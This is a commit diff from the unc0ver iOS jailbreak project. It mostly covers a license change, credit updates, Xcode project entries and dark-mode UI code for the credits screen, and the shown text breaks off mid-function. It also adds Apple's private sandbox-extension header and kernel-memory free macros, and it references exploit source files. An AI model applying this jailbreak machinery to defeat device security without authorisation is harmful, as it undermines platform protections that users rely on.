Update LICENSE

New UI Implemented

remove unnecessary xcode ref

*passes torch*

Clean up

LICENSE

@@ -1,21 +1,29 @@
-MIT License
+BSD 3-Clause License
 
-Copyright (c) 2018 Pwn20wnd
+Copyright (c) 2019, Pwn20wnd
+All rights reserved.
 
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
 
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
 
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+   contributors may be used to endorse or promote products derived from
+   this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

README.md

@@ -4,7 +4,7 @@
 
 unc0ver jailbreak for iOS 11.0 - 12.1.2<br/>
 by [@pwn20wnd](https://twitter.com/Pwn20wnd) & [@sbingner](https://twitter.com/sbingner)<br/>
-UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](https://reddit.com/u/Samg_is_a_Ninja)<br/>
+UI by [@iOS_App_Dev](https://twitter.com/iOS_App_Dev) & [@HiMyNameIsUbik](https://twitter.com/HiMyNameIsUbik)<br/>
 
 ## The most outstanding changes over the other jailbreaks
 * One app to jailbreak all firmwares
@@ -58,15 +58,14 @@ UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](ht
 * [@i41nbeer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake, empty_list, multi_path and deja_xnu
 * [@bazad](https://twitter.com/bazad) for voucher_swap and PAC bypass
 * [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit (No longer used)
-* [@xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
-* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload (No longer used), jailbreakd (No longer used), pspawn_hook (No longer used), machswap and machswap2
+* [@xerub](https://twitter.com/xerub) for the original patchfinder64
+* [@iBSparkes](https://twitter.com/iBSparkes) for the machswap and machswap2
 * [@stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
 * [@theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
 * [@saurik](https://twitter.com/saurik) for Cydia and Substrate
 * [@FCE365](https://twitter.com/FCE365) for the empty_list reliability improvements
-* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel (No longer used), liboffsetfinder64 (No longer used), v1ntex (No longer used) and v3ntex (No longer used)
-* Credits for [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
-* [@coolstarorg](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium
+* [Samg_is_a_ninja](https://reddit.com/u/Samg_is_a_Ninja) for original UI development
+* [@DennisBednarz](https://twitter.com/DennisBednarz) for original UI design
 * [@Cryptiiiic](https://twitter.com/Cryptiiiic) for testing
 * [@xanDesign_](https://twitter.com/xanDesign_) for testing
 * [@AppleDry05](https://twitter.com/AppleDry05) for testing

Undecimus.xcodeproj/project.pbxproj

@@ -24,6 +24,7 @@
 		2150A9E022021348001C8677 /* parameters.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9D922021348001C8677 /* parameters.c */; };
 		2150A9E122021348001C8677 /* kernel_alloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DA22021348001C8677 /* kernel_alloc.c */; };
 		2150A9E222021348001C8677 /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DB22021348001C8677 /* kernel_memory.c */; };
+		2163BE2122A1DB4700518DD9 /* libsandbox.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 2163BE2022A1DB4700518DD9 /* libsandbox.tbd */; };
 		216F3F3D2228776E007DC1BC /* kernel_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F362228776D007DC1BC /* kernel_call.c */; };
 		216F3F3E2228776E007DC1BC /* user_client.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F372228776D007DC1BC /* user_client.c */; };
 		216F3F3F2228776E007DC1BC /* pac.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F3A2228776D007DC1BC /* pac.c */; };
@@ -64,6 +65,9 @@
 		22CFED9221CDFE6B00A216BE /* libmis.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 22CFED9121CDFE6B00A216BE /* libmis.tbd */; };
 		22F91CDB21E02CF300B2FCAE /* inject.m in Sources */ = {isa = PBXBuildFile; fileRef = 22F91CD921E02CF200B2FCAE /* inject.m */; };
 		22F91CE321E033A500B2FCAE /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = 22F91CE221E033A500B2FCAE /* libsnappy.c */; };
+		51435081229E2F0C00446FBA /* Settings-Light.png in Resources */ = {isa = PBXBuildFile; fileRef = 51435080229E2F0C00446FBA /* Settings-Light.png */; };
+		51F1DB24229ED54400B81A6F /* DarkMode-Dark.png in Resources */ = {isa = PBXBuildFile; fileRef = 51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */; };
+		51F1DB25229ED54400B81A6F /* Settings-Dark.png in Resources */ = {isa = PBXBuildFile; fileRef = 51F1DB23229ED54400B81A6F /* Settings-Dark.png */; };
 		8D592A68218E47F60035D2BC /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 8D592A67218E47F60035D2BC /* Main.storyboard */; };
 /* End PBXBuildFile section */
 
@@ -109,6 +113,8 @@
 		2150A9E322021381001C8677 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = "<group>"; };
 		2150A9E422021381001C8677 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = "<group>"; };
 		2150A9E52202138A001C8677 /* IOKitLib.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
+		2163BE1F22A1DB2400518DD9 /* sandbox.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sandbox.h; sourceTree = "<group>"; };
+		2163BE2022A1DB4700518DD9 /* libsandbox.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libsandbox.tbd; path = usr/lib/libsandbox.tbd; sourceTree = SDKROOT; };
 		216F3F352228776D007DC1BC /* user_client.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = user_client.h; sourceTree = "<group>"; };
 		216F3F362228776D007DC1BC /* kernel_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_call.c; sourceTree = "<group>"; };
 		216F3F372228776D007DC1BC /* user_client.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = user_client.c; sourceTree = "<group>"; };
@@ -161,7 +167,6 @@
 		21C130EA214C03690021AA9D /* CreditsTableViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = CreditsTableViewController.m; sourceTree = "<group>"; };
 		21C13117214D268F0021AA9D /* multi_path_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multi_path_sploit.c; sourceTree = "<group>"; };
 		21C13118214D268F0021AA9D /* multi_path_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multi_path_sploit.h; sourceTree = "<group>"; };
-		21C1312E214D5A710021AA9D /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
 		21CC3901227CDFDE0072D572 /* prefs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = prefs.h; sourceTree = "<group>"; };
 		21CC3902227CDFDE0072D572 /* prefs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = prefs.m; sourceTree = "<group>"; };
 		21CC3903227CDFDE0072D572 /* diagnostics.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = diagnostics.m; sourceTree = "<group>"; };
@@ -190,6 +195,14 @@
 		22F91CDA21E02CF300B2FCAE /* inject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = inject.h; path = Injector/inject.h; sourceTree = SOURCE_ROOT; };
 		22F91CDE21E02EB000B2FCAE /* snappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = snappy.h; path = snappy/snappy.h; sourceTree = SOURCE_ROOT; };
 		22F91CE221E033A500B2FCAE /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = libsnappy.c; path = snappy/libsnappy.c; sourceTree = SOURCE_ROOT; };
+		51435080229E2F0C00446FBA /* Settings-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Settings-Light.png"; sourceTree = "<group>"; };
+		51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "DarkMode-Dark.png"; sourceTree = "<group>"; };
+		51F1DB23229ED54400B81A6F /* Settings-Dark.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Settings-Dark.png"; sourceTree = "<group>"; };
+		51F1DB26229F2AD200B81A6F /* RobotoMono-Regular.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "RobotoMono-Regular.ttf"; sourceTree = "<group>"; };
+		51F1DB27229F2BC700B81A6F /* RobotoMono-Bold.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "RobotoMono-Bold.ttf"; sourceTree = "<group>"; };
+		51F1DB28229F31C400B81A6F /* DarkMode-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "DarkMode-Light.png"; sourceTree = "<group>"; };
+		51F1DB29229F31D300B81A6F /* DarkMode-Light.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; name = "DarkMode-Light.png"; path = "../../../../DarkMode-Light.png"; sourceTree = "<group>"; };
+		51F1DB2A229F325700B81A6F /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
 		8D592A67218E47F60035D2BC /* Main.storyboard */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = file.storyboard; path = Main.storyboard; sourceTree = "<group>"; };
 /* End PBXFileReference section */
 
@@ -198,6 +211,7 @@
 			isa = PBXFrameworksBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				2163BE2122A1DB4700518DD9 /* libsandbox.tbd in Frameworks */,
 				21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */,
 				2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */,
 				216FDA1E220C5F5C0086D802 /* libz.tbd in Frameworks */,
@@ -316,6 +330,7 @@
 		21675B62214A68B700D20E2B /* Frameworks */ = {
 			isa = PBXGroup;
 			children = (
+				2163BE2022A1DB4700518DD9 /* libsandbox.tbd */,
 				21B4218F2261302F004C17CD /* MobileCoreServices.framework */,
 				2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */,
 				216FDA1D220C5F5C0086D802 /* libz.tbd */,
@@ -344,6 +359,7 @@
 		2170BD3421B192750059BD10 /* include */ = {
 			isa = PBXGroup;
 			children = (
+				2163BE1F22A1DB2400518DD9 /* sandbox.h */,
 				219BF90422832DBC00A4B827 /* UIProgressHUD.h */,
 				2150A9E322021381001C8677 /* mach_vm.h */,
 				2150A9E422021381001C8677 /* ipc_port.h */,
@@ -365,6 +381,13 @@
 			isa = PBXGroup;
 			children = (
 				21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */,
+				51F1DB26229F2AD200B81A6F /* RobotoMono-Regular.ttf */,
+				51F1DB27229F2BC700B81A6F /* RobotoMono-Bold.ttf */,
+				51F1DB28229F31C400B81A6F /* DarkMode-Light.png */,
+				51F1DB22229ED54300B81A6F /* DarkMode-Dark.png */,
+				51F1DB23229ED54400B81A6F /* Settings-Dark.png */,
+				51435080229E2F0C00446FBA /* Settings-Light.png */,
+				51F1DB29229F31D300B81A6F /* DarkMode-Light.png */,
 			);
 			path = resources;
 			sourceTree = "<group>";
@@ -468,10 +491,10 @@
 				2170BD3621B192B90059BD10 /* resources */,
 				2170BD3421B192750059BD10 /* include */,
 				8D592A67218E47F60035D2BC /* Main.storyboard */,
+				51F1DB2A229F325700B81A6F /* multi_path.entitlements */,
 				21C0FC7321369EB800849420 /* Assets.xcassets */,
 				21C0FC7521369EB800849420 /* LaunchScreen.storyboard */,
 				21C0FC7821369EB800849420 /* Info.plist */,
-				21C1312E214D5A710021AA9D /* multi_path.entitlements */,
 			);
 			path = Undecimus;
 			sourceTree = "<group>";
@@ -584,7 +607,10 @@
 			isa = PBXResourcesBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				51F1DB25229ED54400B81A6F /* Settings-Dark.png in Resources */,
+				51435081229E2F0C00446FBA /* Settings-Light.png in Resources */,
 				21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */,
+				51F1DB24229ED54400B81A6F /* DarkMode-Dark.png in Resources */,
 				8D592A68218E47F60035D2BC /* Main.storyboard in Resources */,
 				21C0FC7421369EB800849420 /* Assets.xcassets in Resources */,
 			);

Undecimus/include/common.h

@@ -8,7 +8,6 @@
 #ifdef __OBJC__
 #include <Foundation/Foundation.h>
 #define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false)
-#define localize(x) NSLocalizedString(x, @"")
 #define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val]
 #else
 #include <CoreFoundation/CoreFoundation.h>
@@ -25,12 +24,16 @@ extern void NSLog(CFStringRef, ...);
 #define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while(false)
 #define CFSafeRelease(x) do { if (x) CFRelease(x); } while(false)
 #define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
+#define SafeSFree(x) do { if (KERN_POINTER_VALID(x)) sfree(x); } while(false)
+#define SafeSFreeNULL(x) do { SafeSFree(x); (x) = KPTR_NULL; } while(false)
+#define SafeIOFree(x, size) do { if (KERN_POINTER_VALID(x)) IOFree(x, size); } while(false)
+#define SafeIOFreeNULL(x, size) do { SafeIOFree(x, size); (x) = KPTR_NULL; } while(false)
 
 #define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
 #define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23
 #define kCFCoreFoundationVersionNumber_iOS_11_0 1443.00
 
-#define auto __auto_type
+#define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
 
 #define ADDR                 "0x%016llx"
 #define MACH_HEADER_MAGIC    MH_MAGIC_64
@@ -51,7 +54,5 @@ extern kptr_t offset_options;
 #define OPT_GET_TASK_ALLOW (1<<0)
 #define OPT_CS_DEBUGGED (1<<1)
 
-#define SIZE_NULL ((size_t) 0)
-
 #endif
 

Undecimus/include/sandbox.h

@@ -0,0 +1,181 @@
+/*
+ * Copyright (c) 2006-2010 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ * 
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ * 
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ * 
+ * @APPLE_LICENSE_HEADER_END@
+ */
+#ifndef _SANDBOX_H_
+#define _SANDBOX_H_
+
+#include <sys/cdefs.h>
+#include <stdint.h>
+#include <unistd.h>
+
+__BEGIN_DECLS
+/*
+ * @function sandbox_init
+ * Places the current process in a sandbox with a profile as
+ * specified.  If the process is already in a sandbox, the new profile
+ * is ignored and sandbox_init() returns an error.
+ *
+ * @param profile (input)   The Sandbox profile to be used.  The format
+ * and meaning of this parameter is modified by the `flags' parameter.
+ *
+ * @param flags (input)   Must be SANDBOX_NAMED.  All other
+ * values are reserved.
+ *
+ * @param errorbuf (output)   In the event of an error, sandbox_init
+ * will set `*errorbuf' to a pointer to a NUL-terminated string
+ * describing the error. This string may contain embedded newlines.
+ * This error information is suitable for developers and is not
+ * intended for end users.
+ *
+ * If there are no errors, `*errorbuf' will be set to NULL.  The
+ * buffer `*errorbuf' should be deallocated with `sandbox_free_error'.
+ *
+ * @result 0 on success, -1 otherwise.
+ */
+int sandbox_init(const char *profile, uint64_t flags, char **errorbuf);
+
+/*
+ * @define SANDBOX_NAMED  The `profile' argument specifies a Sandbox
+ * profile named by one of the kSBXProfile* string constants.
+ */
+#define SANDBOX_NAMED		0x0001
+
+#ifdef __APPLE_API_PRIVATE
+
+/* The following flags are reserved for Mac OS X.  Developers should not
+ * depend on their availability.
+ */
+
+/*
+ * @define SANDBOX_NAMED_BUILTIN   The `profile' argument specifies the
+ * name of a builtin profile that is statically compiled into the
+ * system.
+ */
+#define SANDBOX_NAMED_BUILTIN	0x0002
+
+/*
+ * @define SANDBOX_NAMED_EXTERNAL   The `profile' argument specifies the
+ * pathname of a Sandbox profile.  The pathname may be abbreviated: If
+ * the name does not start with a `/' it is treated as relative to
+ * /usr/share/sandbox and a `.sb' suffix is appended.
+ */
+#define SANDBOX_NAMED_EXTERNAL	0x0003
+
+/*
+ * @define SANDBOX_NAMED_MASK   Mask for name types: 4 bits, 15 possible
+ * name types, 3 currently defined.
+ */
+#define SANDBOX_NAMED_MASK	0x000f
+
+#endif /* __APPLE_API_PRIVATE */
+
+/*
+ * Available Sandbox profiles.
+ */
+
+/* TCP/IP networking is prohibited. */
+extern const char kSBXProfileNoInternet[];
+
+/* All sockets-based networking is prohibited. */
+extern const char kSBXProfileNoNetwork[];
+
+/* File system writes are prohibited. */
+extern const char kSBXProfileNoWrite[];
+
+/* File system writes are restricted to temporary folders /var/tmp and
+ * confstr(_CS_DARWIN_USER_DIR, ...).
+ */
+extern const char kSBXProfileNoWriteExceptTemporary[];
+
+/* All operating system services are prohibited. */
+extern const char kSBXProfilePureComputation[];
+
+/*
+ * @function sandbox_free_error
+ * Deallocates an error string previously allocated by sandbox_init.
+ *
+ * @param errorbuf (input)   The buffer to be freed.  Must be a pointer
+ * previously returned by sandbox_init in the `errorbuf' argument, or NULL.
+ *
+ * @result void
+ */
+void sandbox_free_error(char *errorbuf);
+
+
+#ifdef __APPLE_API_PRIVATE
+
+/* The following definitions are reserved for Mac OS X.  Developers should not
+ * depend on their availability.
+ */
+
+int sandbox_init_with_parameters(const char *profile, uint64_t flags, const char *const parameters[], char **errorbuf);
+
+int sandbox_init_with_extensions(const char *profile, uint64_t flags, const char *const extensions[], char **errorbuf);
+
+enum sandbox_filter_type {
+	SANDBOX_FILTER_NONE,
+	SANDBOX_FILTER_PATH,
+	SANDBOX_FILTER_GLOBAL_NAME,
+	SANDBOX_FILTER_LOCAL_NAME,
+	SANDBOX_FILTER_APPLEEVENT_DESTINATION,
+	SANDBOX_FILTER_RIGHT_NAME,
+};
+
+extern const enum sandbox_filter_type SANDBOX_CHECK_NO_REPORT __attribute__((weak_import));
+
+enum sandbox_extension_flags {
+	FS_EXT_DEFAULTS =              0,
+	FS_EXT_FOR_PATH =       (1 << 0),
+	FS_EXT_FOR_FILE =       (1 << 1),
+	FS_EXT_READ =           (1 << 2),
+	FS_EXT_WRITE =          (1 << 3),
+	FS_EXT_PREFER_FILEID =  (1 << 4),
+};
+
+int sandbox_check(pid_t pid, const char *operation, enum sandbox_filter_type type, ...);
+
+int sandbox_note(const char *note);
+
+int sandbox_suspend(pid_t pid);
+int sandbox_unsuspend(void);
+
+int sandbox_issue_extension(const char *path, char **ext_token);
+int sandbox_issue_fs_extension(const char *path, uint64_t flags, char **ext_token);
+int sandbox_issue_fs_rw_extension(const char *path, char **ext_token);
+int sandbox_issue_mach_extension(const char *name, char **ext_token);
+
+int sandbox_consume_extension(const char *path, const char *ext_token);
+int sandbox_consume_fs_extension(const char *ext_token, char **path);
+int sandbox_consume_mach_extension(const char *ext_token, char **name);
+
+int sandbox_release_fs_extension(const char *ext_token);
+
+int sandbox_container_path_for_pid(pid_t pid, char *buffer, size_t bufsize);
+
+int sandbox_wakeup_daemon(char **errorbuf);
+
+const char *_amkrtemp(const char *);
+
+#endif /* __APPLE_API_PRIVATE */
+
+__END_DECLS
+#endif /* _SANDBOX_H_ */

Undecimus/source/CreditsTableViewController.h

@@ -12,4 +12,32 @@
 
 + (NSURL *)getURLForUserName:(NSString *)userName;
 
+@property (weak, nonatomic) IBOutlet UIButton *ianBeerButton;
+@property (weak, nonatomic) IBOutlet UIButton *bazadButton;
+@property (weak, nonatomic) IBOutlet UIButton *morpheusButton;
+@property (weak, nonatomic) IBOutlet UIButton *xerubButton;
+@property (weak, nonatomic) IBOutlet UIButton *psychoTeaButton;
+@property (weak, nonatomic) IBOutlet UIButton *stekButton;
+@property (weak, nonatomic) IBOutlet UIButton *ninjaPrawnButton;
+@property (weak, nonatomic) IBOutlet UIButton *crypticButton;
+@property (weak, nonatomic) IBOutlet UIButton *xerusDesignButton;
+@property (weak, nonatomic) IBOutlet UIButton *appleDryButton;
+@property (weak, nonatomic) IBOutlet UIButton *robButton;
+@property (weak, nonatomic) IBOutlet UIButton *midnightChipButton;
+@property (weak, nonatomic) IBOutlet UIButton *geoSn0wButton;
+@property (weak, nonatomic) IBOutlet UIButton *swaggoButton;
+@property (weak, nonatomic) IBOutlet UIButton *jailbreakbusterButton;
+@property (weak, nonatomic) IBOutlet UIButton *jakeashacksButton;
+@property (weak, nonatomic) IBOutlet UIButton *saurikButton;
+@property (weak, nonatomic) IBOutlet UIButton *siguzaButton;
+@property (weak, nonatomic) IBOutlet UIButton *externalistButton;
+@property (weak, nonatomic) IBOutlet UIButton *realBrightiupButton;
+@property (weak, nonatomic) IBOutlet UIButton *nitoTVButton;
+@property (weak, nonatomic) IBOutlet UIButton *matchsticButton;
+@property (weak, nonatomic) IBOutlet UIButton *umanghereButton;
+@property (weak, nonatomic) IBOutlet UIButton *miscMistyButton;
+@property (weak, nonatomic) IBOutlet UIButton *benButton;
+@property (weak, nonatomic) IBOutlet UIButton *samGButton;
+@property (weak, nonatomic) IBOutlet UIButton *dennisButton;
+
 @end

Undecimus/source/CreditsTableViewController.m

@@ -16,15 +16,8 @@
 
 - (void)viewDidLoad {
     [super viewDidLoad];
-    UIImageView *myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
-    [myImageView setContentMode:UIViewContentModeScaleAspectFill];
-    [myImageView setFrame:self.tableView.frame];
-    UIView *myView = [[UIView alloc] initWithFrame:myImageView.frame];
-    [myView setBackgroundColor:[UIColor whiteColor]];
-    [myView setAlpha:0.84];
-    [myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
-    [myImageView addSubview:myView];
-    [self.tableView setBackgroundView:myImageView];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(darkModeCreditsView:) name:@"darkModeCredits" object:nil];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(lightModeCreditsView:) name:@"lightModeCredits" object:nil];
 }
 
 - (void)didReceiveMemoryWarning {
@@ -32,6 +25,68 @@
     // Dispose of any resources that can be recreated.
 }
 
+-(void) darkModeCreditsView:(NSNotification *) notification  {
+    
+    [self.ianBeerButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.bazadButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.morpheusButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.xerubButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.psychoTeaButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.stekButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.ninjaPrawnButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.crypticButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.xerusDesignButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.appleDryButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.robButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.midnightChipButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.geoSn0wButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.swaggoButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.jailbreakbusterButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.jakeashacksButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.saurikButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.siguzaButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.externalistButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.realBrightiupButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.nitoTVButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.matchsticButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.umanghereButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.miscMistyButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.benButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.samGButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.dennisButton setTitleColor:[UIColor whiteColor] forState:normal];
+}
+
+-(void) lightModeCreditsView:(NSNotification *) notification  {
+    
+    [self.ianBeerButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.bazadButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.morpheusButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.xerubButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.psychoTeaButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.stekButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.ninjaPrawnButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.crypticButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.xerusDesignButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.appleDryButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.robButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.midnightChipButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.geoSn0wButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.swaggoButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.jailbreakbusterButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.jakeashacksButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.saurikButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.siguzaButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.externalistButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.realBrightiupButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.nitoTVButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.matchsticButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.umanghereButton setTitleColor:[UIColor blackColor] forState:normal];
